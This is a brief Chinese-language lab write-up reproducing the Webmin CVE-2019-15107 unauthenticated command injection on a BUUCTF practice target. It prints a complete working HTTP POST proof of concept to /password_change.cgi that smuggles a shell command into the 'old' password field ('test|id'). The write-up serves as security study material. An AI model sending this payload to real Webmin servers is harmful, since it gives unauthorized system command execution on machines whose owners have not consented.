漏洞简介
Webmin 是一个用于管理类 Unix 系统的管理配置工具,具有 Web 页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。
漏洞靶场
BUUCTF 的 Real 分类下,[Webmin]CVE-2019-15107
模块。
复现过程
直接进入提示内容如下:
在 URl 地址栏前面增加 https://
即可:
使用 BurpSuite 对该页面进行抓包,将数据包发送到 Repeater,然后使用下面的 POC:
POST /password_change.cgi HTTP/1.1
Host: node4.buuoj.cn:28720
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://node4.buuoj.cn:28720/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
注意:将 Host 和 Referer 中的地址更改为自己的实际地址。
在返回包中发现了内容:
使用 pwd
命令,查看当前所在的目录: